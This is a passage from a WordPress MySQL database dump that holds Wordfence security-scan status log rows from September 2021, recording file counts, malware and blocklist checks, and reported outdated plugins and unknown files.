Wordfence scanning servers.'),(4310,1630879032.505167,2,'info','Done host key check.'),(4311,1630879032.529549,2,'info','Done examining URLs'),(4316,1630879033.120365,2,'info','Starting password strength check on 1 user.'),(4323,1630879037.321780,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4324,1630879037.324048,2,'info','Done examining URLs'),(4326,1630879037.553596,1,'info','-------------------'),(4327,1630879037.564063,2,'info','Wordfence used 17.54 MB of memory for scan. Server peak memory usage was: 43.54 MB'),(4328,1630879037.574500,1,'info','Scan Complete. Scanned 5898 files, 8 plugins, 4 themes, 19 posts, 0 comments and 800 URLs in 6 minutes 36 seconds.'),(4331,1630932806.046650,1,'info','Initiating quick scan'),(4336,1630932806.202906,1,'info','-------------------'),(4337,1630932806.225533,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4338,1630932806.239639,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4341,1631019346.928152,1,'info','Initiating quick scan'),(4346,1631019347.134620,1,'info','-------------------'),(4347,1631019347.157897,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(4348,1631019347.169279,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4351,1631105607.646233,1,'info','Initiating quick scan'),(4356,1631105607.815095,1,'info','-------------------'),(4357,1631105607.836878,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4358,1631105607.847284,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4360,1631137872.958213,1,'info','Scheduled Wordfence scan starting at Wednesday 8th of September 2021 09:51:12 PM'),(4362,1631137873.726994,1,'info','Contacting Wordfence to initiate scan'),(4369,1631137881.051637,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(4370,1631137881.073933,2,'info','The disk has 3458076.28 MB available'),(4378,1631137881.557820,2,'info','Including files that are outside the WordPress installation in the scan.'),(4379,1631137881.578852,2,'info','Getting plugin list from WordPress'),(4380,1631137881.614660,2,'info','Found 7 plugins'),(4381,1631137881.634309,2,'info','Getting theme list from WordPress'),(4382,1631137881.747585,2,'info','Found 4 themes'),(4389,1631137884.298273,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(4390,1631137884.363762,10,'info','SUM_START:Comparing open source themes against WordPress.org originals'),(4391,1631137884.428968,10,'info','SUM_START:Comparing plugins against WordPress.org originals'),(4392,1631137884.524976,10,'info','SUM_START:Scanning for known malware files'),(4393,1631137884.573966,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(4394,1631137884.896058,2,'info','500 files indexed'),(4395,1631137884.991352,2,'info','1000 files indexed'),(4396,1631137885.171420,2,'info','1500 files indexed'),(4397,1631137885.364517,2,'info','2000 files indexed'),(4398,1631137885.508788,2,'info','2500 files indexed'),(4399,1631137885.718077,2,'info','3000 files indexed'),(4400,1631137887.118900,2,'info','3500 files indexed'),(4401,1631137887.499715,2,'info','4000 files indexed'),(4402,1631137887.918908,2,'info','4500 files indexed'),(4403,1631137888.271587,2,'info','5000 files indexed'),(4404,1631137888.400511,2,'info','5500 files indexed'),(4405,1631137888.691336,2,'info','5898 files indexed'),(4406,1631137900.142170,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(4407,1631137906.192908,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(4408,1631137911.868280,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(4409,1631137917.493615,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(4410,1631137923.319131,2,'info','Analyzed 500 files containing 7.67 MB of data so far'),(4411,1631137931.296702,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(4412,1631137937.885899,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(4413,1631137945.026431,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(4414,1631137952.691136,2,'info','Analyzed 900 files containing 18.57 MB of data so far'),(4415,1631137958.226743,2,'info','Analyzed 1000 files containing 22.1 MB of data so far'),(4416,1631137965.336901,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(4417,1631137972.263313,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(4418,1631137981.171140,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(4419,1631137989.720399,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(4420,1631137996.407004,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(4421,1631138002.978512,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(4422,1631138011.262969,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(4423,1631138017.438752,2,'info','Analyzed 1800 files containing 35.52 MB of data so far'),(4424,1631138023.826229,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(4425,1631138029.723376,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(4426,1631138035.695136,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(4427,1631138044.646589,2,'info','Analyzed 2200 files containing 41.87 MB of data so far'),(4428,1631138051.882751,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(4429,1631138058.582507,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(4430,1631138064.631021,2,'info','Analyzed 2500 files containing 45.32 MB of data so far'),(4431,1631138071.622192,2,'info','Analyzed 2600 files containing 45.8 MB of data so far'),(4432,1631138078.945050,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(4433,1631138084.912476,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(4434,1631138092.693468,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(4435,1631138099.593368,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(4436,1631138107.299940,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(4437,1631138114.142080,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(4438,1631138119.571126,2,'info','Analyzed 3300 files containing 48.4 MB of data so far'),(4439,1631138124.877697,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(4440,1631138128.231947,2,'info','Analyzed 3500 files containing 54.52 MB of data so far'),(4441,1631138130.974915,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(4442,1631138134.312996,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(4443,1631138137.544513,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(4444,1631138142.537299,2,'info','Analyzed 3900 files containing 70.45 MB of data so far'),(4445,1631138145.066488,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(4446,1631138147.594826,2,'info','Analyzed 4100 files containing 81.89 MB of data so far'),(4447,1631138150.190981,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(4448,1631138153.378597,2,'info','Analyzed 4300 files containing 96.16 MB of data so far'),(4449,1631138155.541955,2,'info','Analyzed 4400 files containing 96.84 MB of data so far'),(4450,1631138158.000454,2,'info','Analyzed 4500 files containing 97.07 MB of data so far'),(4451,1631138160.535629,2,'info','Analyzed 4600 files containing 97.22 MB of data so far'),(4452,1631138164.651064,2,'info','Analyzed 4700 files containing 97.34 MB of data so far'),(4453,1631138165.881604,2,'info','Analyzed 4800 files containing 97.63 MB of data so far'),(4454,1631138170.895804,2,'info','Analyzed 4900 files containing 99.61 MB of data so far'),(4455,1631138174.037374,2,'info','Analyzed 5000 files containing 102.57 MB of data so far'),(4456,1631138176.614095,2,'info','Analyzed 5100 files containing 104.43 MB of data so far'),(4457,1631138180.251968,2,'info','Analyzed 5200 files containing 106.04 MB of data so far'),(4458,1631138183.304814,2,'info','Analyzed 5300 files containing 115.93 MB of data so far'),(4459,1631138187.982259,2,'info','Analyzed 5400 files containing 119.29 MB of data so far'),(4460,1631138192.452966,2,'info','Analyzed 5500 files containing 121.52 MB of data so far'),(4461,1631138196.220839,2,'info','Analyzed 5600 files containing 124.4 MB of data so far'),(4462,1631138198.992195,2,'info','Analyzed 5700 files containing 127.26 MB of data so far'),(4463,1631138204.794813,2,'info','Analyzed 5800 files containing 128.56 MB of data so far'),(4464,1631138207.452217,2,'info','Analyzed 5898 files containing 130.18 MB of data.'),(4465,1631138207.457443,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(4466,1631138207.486893,10,'info','SUM_ENDOK:Comparing open source themes against WordPress.org originals'),(4467,1631138207.504094,10,'info','SUM_ENDOK:Comparing plugins against WordPress.org originals'),(4468,1631138207.512236,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(4469,1631138208.123616,10,'info','SUM_ENDOK:Scanning for known malware files'),(4470,1631138208.150586,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(4471,1631138208.172975,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(4472,1631138208.224280,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(4473,1631138208.241041,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(4474,1631138209.651733,2,'info','Starting scan of file contents'),(4475,1631138210.679954,2,'info','Scanned contents of 37 additional files at 36.81 per second'),(4476,1631138211.694196,2,'info','Scanned contents of 55 additional files at 27.24 per second'),(4477,1631138212.749611,2,'info','Scanned contents of 66 additional files at 21.47 per second'),(4478,1631138213.752181,2,'info','Scanned contents of 90 additional files at 22.07 per second'),(4479,1631138214.773876,2,'info','Scanned contents of 130 additional files at 25.50 per second'),(4480,1631138215.819840,2,'info','Scanned contents of 167 additional files at 27.18 per second'),(4481,1631138217.896272,2,'info','Scanned contents of 173 additional files at 21.04 per second'),(4482,1631138218.927326,2,'info','Scanned contents of 225 additional files at 24.32 per second'),(4483,1631138219.955871,2,'info','Scanned contents of 251 additional files at 24.41 per second'),(4484,1631138221.011494,2,'info','Scanned contents of 279 additional files at 24.61 per second'),(4485,1631138222.039295,2,'info','Scanned contents of 303 additional files at 24.51 per second'),(4486,1631138223.042156,2,'info','Scanned contents of 346 additional files at 25.88 per second'),(4487,1631138224.053004,2,'info','Scanned contents of 386 additional files at 26.85 per second'),(4488,1631138225.056073,2,'info','Scanned contents of 441 additional files at 28.67 per second'),(4489,1631138226.088956,2,'info','Scanned contents of 472 additional files at 28.76 per second'),(4490,1631138227.102244,2,'info','Scanned contents of 511 additional files at 29.32 per second'),(4491,1631138227.326936,2,'info','Scanned contents of 524 additional files at 29.68 per second'),(4492,1631138227.329012,2,'info','Asking Wordfence to check URLs against malware list.'),(4493,1631138227.331493,2,'info','Checking 277 host keys against Wordfence scanning servers.'),(4494,1631138227.944216,2,'info','Done host key check.'),(4495,1631138228.149265,2,'info','Done file contents scan'),(4496,1631138228.160391,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(4497,1631138228.193542,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(4498,1631138228.230971,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(4499,1631138228.253892,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(4500,1631138228.344086,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(4501,1631138228.550414,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4502,1631138228.554583,2,'info','Checking 236 host keys against Wordfence scanning servers.'),(4503,1631138229.160440,2,'info','Done host key check.'),(4504,1631138229.170746,2,'info','Done examining URLs'),(4505,1631138229.365532,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(4506,1631138229.405915,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(4507,1631138229.583132,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(4508,1631138229.606386,10,'info','SUM_START:Scanning for weak passwords'),(4509,1631138229.624549,2,'info','Starting password strength check on 1 user.'),(4510,1631138229.760153,10,'info','SUM_ENDOK:Scanning for weak passwords'),(4511,1631138229.798414,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4512,1631138232.960913,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4513,1631138233.570224,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(4514,1631138234.186618,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(4515,1631138234.228455,10,'info','SUM_START:Scanning for suspicious site options'),(4516,1631138234.318536,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4517,1631138234.321492,2,'info','Done examining URLs'),(4518,1631138234.398904,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(4519,1631138234.424190,1,'info','-------------------'),(4520,1631138234.427421,2,'info','Wordfence used 17.55 MB of memory for scan. Server peak memory usage was: 43.55 MB'),(4521,1631138234.429854,1,'info','Scan Complete. Scanned 5898 files, 8 plugins, 4 themes, 19 posts, 0 comments and 800 URLs in 6 minutes.'),(4522,1631138234.432135,10,'info','SUM_FINAL:Scan complete. You have 12 new issues to fix. See below.'),(4523,1631192006.153745,10,'info','SUM_PREP:Preparing a new scan.'),(4524,1631192006.168630,1,'info','Initiating quick scan'),(4525,1631192006.194458,10,'info','SUM_START:Checking Web Application Firewall status'),(4526,1631192006.205238,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4527,1631192006.249553,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4528,1631192006.332914,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4529,1631192006.355015,1,'info','-------------------'),(4530,1631192006.376268,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4531,1631192006.387033,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4532,1631192006.397873,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),(4533,1631278408.513206,10,'info','SUM_PREP:Preparing a new scan.'),(4534,1631278408.562904,1,'info','Initiating quick scan'),(4535,1631278408.619204,10,'info','SUM_START:Checking Web Application Firewall status'),(4536,1631278408.639664,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4537,1631278408.713283,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4538,1631278408.805667,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4539,1631278408.827391,1,'info','-------------------'),(4540,1631278408.840465,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4541,1631278408.851136,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4542,1631278408.865247,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),(4543,1631364915.434545,10,'info','SUM_PREP:Preparing a new scan.'),(4544,1631364915.472729,1,'info','Initiating quick scan'),(4545,1631364915.508426,10,'info','SUM_START:Checking Web Application Firewall status'),(4546,1631364915.518950,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4547,1631364915.572439,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4548,1631364915.644431,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4549,1631364915.672547,1,'info','-------------------'),(4550,1631364915.698882,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(4551,1631364915.709030,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4552,1631364915.719180,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),(4553,1631397174.475881,1,'info','Scheduled Wordfence scan starting at Saturday 11th of September 2021 09:52:54 PM'),(4554,1631397174.998179,10,'info','SUM_PREP:Preparing a new scan.'),(4555,1631397175.008098,1,'info','Contacting Wordfence to initiate scan'),(4556,1631397175.960862,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(4557,1631397178.006521,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(4558,1631397180.088602,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(4559,1631397182.143637,10,'info','SUM_START:Checking for the most secure way to get IPs'),(4560,1631397184.516444,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(4561,1631397185.077038,10,'info','SUM_START:Scanning to check available disk space'),(4562,1631397185.084131,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(4563,1631397185.085952,2,'info','The disk has 3457693.76 MB available'),(4564,1631397185.087827,10,'info','SUM_ENDOK:Scanning to check available disk space'),(4565,1631397185.103977,10,'info','SUM_START:Checking Web Application Firewall status'),(4566,1631397185.108645,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4567,1631397185.118578,10,'info','SUM_START:Checking for future GeoIP support'),(4568,1631397185.123534,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(4569,1631397185.133408,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(4570,1631397185.143265,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(4571,1631397185.151466,2,'info','Including files that are outside the WordPress installation in the scan.'),(4572,1631397185.155562,2,'info','Getting plugin list from WordPress'),(4573,1631397185.160027,2,'info','Found 7 plugins'),(4574,1631397185.163443,2,'info','Getting theme list from WordPress'),(4575,1631397185.190665,2,'info','Found 4 themes'),(4576,1631397185.674836,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(4577,1631397186.884690,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(4578,1631397186.939124,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(4579,1631397186.960820,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(4580,1631397187.005407,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(4581,1631397187.047069,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(4582,1631397187.117715,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(4583,1631397187.177553,10,'info','SUM_START:Comparing open source themes against WordPress.org originals'),(4584,1631397187.233333,10,'info','SUM_START:Comparing plugins against WordPress.org originals'),(4585,1631397187.267562,10,'info','SUM_START:Scanning for known malware files'),(4586,1631397187.313738,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(4587,1631397187.518871,2,'info','500 files indexed'),(4588,1631397187.610304,2,'info','1000 files indexed'),(4589,1631397187.700725,2,'info','1500 files indexed'),(4590,1631397187.830164,2,'info','2000 files indexed'),(4591,1631397187.960144,2,'info','2500 files indexed'),(4592,1631397188.102272,2,'info','3000 files indexed'),(4593,1631397190.960222,2,'info','3500 files indexed'),(4594,1631397191.054272,2,'info','4000 files indexed'),(4595,1631397191.070936,2,'info','4001 files indexed'),(4596,1631397191.854880,2,'info','4501 files indexed'),(4597,1631397191.924254,2,'info','5001 files indexed'),(4598,1631397191.983603,2,'info','5501 files indexed'),(4599,1631397192.026901,2,'info','5894 files indexed'),(4600,1631397194.631810,2,'info','Analyzed 100 files containing 1.6 MB of data so far'),(4601,1631397198.252775,2,'info','Analyzed 200 files containing 2.8 MB of data so far'),(4602,1631397201.268540,2,'info','Analyzed 300 files containing 3.98 MB of data so far'),(4603,1631397205.055639,2,'info','Analyzed 400 files containing 6.77 MB of data so far'),(4604,1631397209.959999,2,'info','Analyzed 500 files containing 7.68 MB of data so far'),(4605,1631397215.853125,2,'info','Analyzed 600 files containing 9.49 MB of data so far'),(4606,1631397222.525192,2,'info','Analyzed 700 files containing 11.62 MB of data so far'),(4607,1631397229.930053,2,'info','Analyzed 800 files containing 15.71 MB of data so far'),(4608,1631397235.437840,2,'info','Analyzed 900 files containing 18.58 MB of data so far'),(4609,1631397242.884275,2,'info','Analyzed 1000 files containing 22.11 MB of data so far'),(4610,1631397250.373585,2,'info','Analyzed 1100 files containing 22.8 MB of data so far'),(4611,1631397257.415017,2,'info','Analyzed 1200 files containing 24.47 MB of data so far'),(4612,1631397263.472766,2,'info','Analyzed 1300 files containing 30.54 MB of data so far'),(4613,1631397268.929339,2,'info','Analyzed 1400 files containing 32.66 MB of data so far'),(4614,1631397277.061365,2,'info','Analyzed 1500 files containing 33.25 MB of data so far'),(4615,1631397282.342058,2,'info','Analyzed 1600 files containing 34.64 MB of data so far'),(4616,1631397288.000564,2,'info','Analyzed 1700 files containing 35.09 MB of data so far'),(4617,1631397294.989753,2,'info','Analyzed 1800 files containing 35.52 MB of data so far'),(4618,1631397302.835697,2,'info','Analyzed 1900 files containing 35.83 MB of data so far'),(4619,1631397309.536215,2,'info','Analyzed 2000 files containing 36.36 MB of data so far'),(4620,1631397314.939954,2,'info','Analyzed 2100 files containing 38.47 MB of data so far'),(4621,1631397322.821135,2,'info','Analyzed 2200 files containing 41.88 MB of data so far'),(4622,1631397329.165161,2,'info','Analyzed 2300 files containing 44.21 MB of data so far'),(4623,1631397335.718416,2,'info','Analyzed 2400 files containing 45.13 MB of data so far'),(4624,1631397342.077270,2,'info','Analyzed 2500 files containing 45.33 MB of data so far'),(4625,1631397348.408765,2,'info','Analyzed 2600 files containing 45.81 MB of data so far'),(4626,1631397354.596399,2,'info','Analyzed 2700 files containing 46.11 MB of data so far'),(4627,1631397359.948295,2,'info','Analyzed 2800 files containing 46.36 MB of data so far'),(4628,1631397366.238422,2,'info','Analyzed 2900 files containing 46.93 MB of data so far'),(4629,1631397373.719468,2,'info','Analyzed 3000 files containing 47.68 MB of data so far'),(4630,1631397379.868964,2,'info','Analyzed 3100 files containing 47.89 MB of data so far'),(4631,1631397386.421435,2,'info','Analyzed 3200 files containing 47.93 MB of data so far'),(4632,1631397390.491735,2,'info','Analyzed 3300 files containing 48.41 MB of data so far'),(4633,1631397397.018888,2,'info','Analyzed 3400 files containing 52.93 MB of data so far'),(4634,1631397403.796017,2,'info','Analyzed 3500 files containing 54.52 MB of data so far'),(4635,1631397409.031011,2,'info','Analyzed 3600 files containing 57.96 MB of data so far'),(4636,1631397413.680223,2,'info','Analyzed 3700 files containing 59.04 MB of data so far'),(4637,1631397419.637619,2,'info','Analyzed 3800 files containing 63.78 MB of data so far'),(4638,1631397425.765734,2,'info','Analyzed 3900 files containing 70.46 MB of data so far'),(4639,1631397432.862802,2,'info','Analyzed 4000 files containing 76.18 MB of data so far'),(4640,1631397443.121489,2,'info','Analyzed 4100 files containing 81.9 MB of data so far'),(4641,1631397450.808879,2,'info','Analyzed 4200 files containing 88.28 MB of data so far'),(4642,1631397455.195850,2,'info','Analyzed 4300 files containing 96.16 MB of data so far'),(4643,1631397461.515788,2,'info','Analyzed 4400 files containing 96.84 MB of data so far'),(4644,1631397468.161146,2,'info','Analyzed 4500 files containing 97.08 MB of data so far'),(4645,1631397472.890464,2,'info','Analyzed 4600 files containing 97.23 MB of data so far'),(4646,1631397479.014060,2,'info','Analyzed 4700 files containing 97.35 MB of data so far'),(4647,1631397485.639938,2,'info','Analyzed 4800 files containing 97.63 MB of data so far'),(4648,1631397491.398894,2,'info','Analyzed 4900 files containing 99.61 MB of data so far'),(4649,1631397498.659166,2,'info','Analyzed 5000 files containing 102.57 MB of data so far'),(4650,1631397503.298226,2,'info','Analyzed 5100 files containing 104.43 MB of data so far'),(4651,1631397510.167319,2,'info','Analyzed 5200 files containing 106.06 MB of data so far'),(4652,1631397518.143934,2,'info','Analyzed 5300 files containing 116 MB of data so far'),(4653,1631397525.019458,2,'info','Analyzed 5400 files containing 119.32 MB of data so far'),(4654,1631397532.856581,2,'info','Analyzed 5500 files containing 121.58 MB of data so far'),(4655,1631397539.464045,2,'info','Analyzed 5600 files containing 124.5 MB of data so far'),(4656,1631397549.690756,2,'info','Analyzed 5700 files containing 127.35 MB of data so far'),(4657,1631397555.098040,2,'info','Analyzed 5800 files containing 128.61 MB of data so far'),(4658,1631397560.966822,2,'info','Analyzed 5894 files containing 130.22 MB of data.'),(4659,1631397560.979892,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(4660,1631397561.045573,10,'info','SUM_ENDOK:Comparing open source themes against WordPress.org originals'),(4661,1631397561.136949,10,'info','SUM_ENDOK:Comparing plugins against WordPress.org originals'),(4662,1631397561.204756,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(4663,1631397561.873369,10,'info','SUM_ENDOK:Scanning for known malware files'),(4664,1631397561.952196,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(4665,1631397562.345713,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(4666,1631397562.818124,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(4667,1631397562.865459,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(4668,1631397564.429216,2,'info','Starting scan of file contents'),(4669,1631397566.978875,2,'info','Scanned contents of 24 additional files at 21.36 per second'),(4670,1631397567.991067,2,'info','Scanned contents of 63 additional files at 29.50 per second'),(4671,1631397568.994293,2,'info','Scanned contents of 84 additional files at 26.76 per second'),(4672,1631397569.999735,2,'info','Scanned contents of 120 additional files at 28.95 per second'),(4673,1631397571.010083,2,'info','Scanned contents of 171 additional files at 33.17 per second'),(4674,1631397572.018944,2,'info','Scanned contents of 218 additional files at 35.37 per second'),(4675,1631397573.502923,2,'info','Scanned contents of 254 additional files at 33.21 per second'),(4676,1631397574.507829,2,'info','Scanned contents of 287 additional files at 33.17 per second'),(4677,1631397575.514560,2,'info','Scanned contents of 333 additional files at 34.47 per second'),(4678,1631397576.539111,2,'info','Scanned contents of 378 additional files at 35.38 per second'),(4679,1631397577.555854,2,'info','Scanned contents of 407 additional files at 34.78 per second'),(4680,1631397578.620051,2,'info','Scanned contents of 424 additional files at 33.22 per second'),(4681,1631397579.776694,2,'info','Scanned contents of 440 additional files at 31.61 per second'),(4682,1631397580.878730,2,'info','Scanned contents of 468 additional files at 31.15 per second'),(4683,1631397581.879456,2,'info','Scanned contents of 484 additional files at 30.20 per second'),(4684,1631397582.696712,2,'info','Scanned contents of 520 additional files at 30.88 per second'),(4685,1631397582.701014,2,'info','Asking Wordfence to check URLs against malware list.'),(4686,1631397582.714284,2,'info','Checking 274 host keys against Wordfence scanning servers.'),(4687,1631397583.344528,2,'info','Done host key check.'),(4688,1631397583.414140,2,'info','Done file contents scan'),(4689,1631397583.418864,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(4690,1631397583.434278,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(4691,1631397583.454857,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(4692,1631397583.464529,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(4693,1631397583.487449,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(4694,1631397583.940068,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4695,1631397583.943578,2,'info','Checking 236 host keys against Wordfence scanning servers.'),(4696,1631397584.531251,2,'info','Done host key check.'),(4697,1631397584.543219,2,'info','Done examining URLs'),(4698,1631397584.724580,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(4699,1631397584.992156,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(4700,1631397585.080254,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(4701,1631397585.136831,10,'info','SUM_START:Scanning for weak passwords'),(4702,1631397585.180786,2,'info','Starting password strength check on 1 user.'),(4703,1631397585.271062,10,'info','SUM_ENDOK:Scanning for weak passwords'),(4704,1631397585.315687,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4705,1631397588.300040,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4706,1631397588.344448,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(4707,1631397588.970490,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(4708,1631397588.994510,10,'info','SUM_START:Scanning for suspicious site options'),(4709,1631397589.063345,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4710,1631397589.065240,2,'info','Done examining URLs'),(4711,1631397589.124859,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(4712,1631397589.134304,1,'info','-------------------'),(4713,1631397589.137772,2,'info','Wordfence used 17.57 MB of memory for scan. Server peak memory usage was: 43.57 MB'),(4714,1631397589.139693,1,'info','Scan Complete. Scanned 5894 files, 8 plugins, 4 themes, 19 posts, 0 comments and 798 URLs in 6 minutes 54 seconds.'),(4715,1631397589.141471,10,'info','SUM_FINAL:Scan complete. You have 8 new issues to fix. See below.'),(4716,1631451213.144916,10,'info','SUM_PREP:Preparing a new scan.'),(4717,1631451213.162637,1,'info','Initiating quick scan'),(4718,1631451213.220907,10,'info','SUM_START:Checking Web Application Firewall status'),(4719,1631451213.229727,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4720,1631451213.267830,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4721,1631451213.351264,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4722,1631451213.379248,1,'info','-------------------'),(4723,1631451213.395300,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(4724,1631451213.407565,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4725,1631451213.429682,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),(4726,1631537673.689743,10,'info','SUM_PREP:Preparing a new scan.'),(4727,1631537673.727003,1,'info','Initiating quick scan'),(4728,1631537673.760162,10,'info','SUM_START:Checking Web Application Firewall status'),(4729,1631537673.770790,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4730,1631537673.803892,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4731,1631537673.886017,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4732,1631537673.908035,1,'info','-------------------'),(4733,1631537673.928963,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(4734,1631537673.939363,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4735,1631537673.949796,10,'info','SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wftrafficrates`
--
DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
